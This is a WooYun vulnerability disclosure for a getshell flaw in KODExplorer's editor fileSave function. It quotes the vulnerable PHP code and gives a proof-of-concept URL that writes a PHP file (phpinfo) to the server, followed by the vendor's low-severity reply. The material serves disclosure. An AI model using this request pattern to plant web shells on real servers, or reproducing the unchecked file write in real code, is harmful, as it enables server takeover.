当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076310

漏洞标题:芒果云KODExlporer getshell(二)

相关厂商:千帆网络工作室

漏洞作者: 狗狗侠

提交时间:2014-09-17 13:58

修复时间:2014-12-16 14:00

公开时间:2014-12-16 14:00

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-17: 细节已通知厂商并且等待厂商处理中
2014-09-17: 厂商已经确认,细节仅向厂商公开
2014-09-20: 细节向第三方安全合作伙伴开放
2014-11-11: 细节向核心白帽子及相关领域专家公开
2014-11-21: 细节向普通白帽子公开
2014-12-01: 细节向实习白帽子公开
2014-12-16: 细节向公众公开

简要描述:

来第二弹getshell
别又是虚假漏洞?

详细说明:

代码留给厂商看
这是在editor.class.php当中的

public function fileSave(){
		$filestr = rawurldecode($this->in['filestr']);
		//echo $filestr.'-------------';exit();
		$charset = $this->in['charset'];
		$path =_DIR($this->in['path']);
		//echo $path;exit();
		//echo $path;
		//echo is_writable($path);exit();
		if (!is_writable($path)) show_json($this->L['no_permission_write'],false);
		//phpinfo();
		//echo $path.'----aaa';exit();
		if ($charset !='' || $charset != 'utf-8') {
			$filestr=mb_convert_encoding($filestr,$this->in['charset'],'utf-8');
		}
		//echo $path.'----aaa';exit();
		$fp=fopen($path,'wb');
		fwrite($fp,$filestr);
		fclose($fp);
		show_json($this->L['save_success']);


获取字符串$filestr = rawurldecode($this->in['filestr']);
$path =_DIR($this->in['path']); 获取路径。。。
其中跟踪留给厂商。。。
直接写shell
给出语句如下:
http://localhost/www/index.php?editor/fileSave&path=./test.php&filestr=%3C?php%20phpinfo%28%29;?%3E

3.jpg


其他的自己测

4.jpg


漏洞证明:

4.jpg

修复方案:

版权声明:转载请注明来源 狗狗侠@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-09-17 14:45

厂商回复:

之前已经解释过,管理员拥有服务器最高权限;
通过界面就可以新建php文件,然后打开,在线写代码然后调试等等。何必构造一个url
本来只是自己用的一个工具,开源后应用户需求加入了多用户……
唉,还是懒得解释了

最新状态:

暂无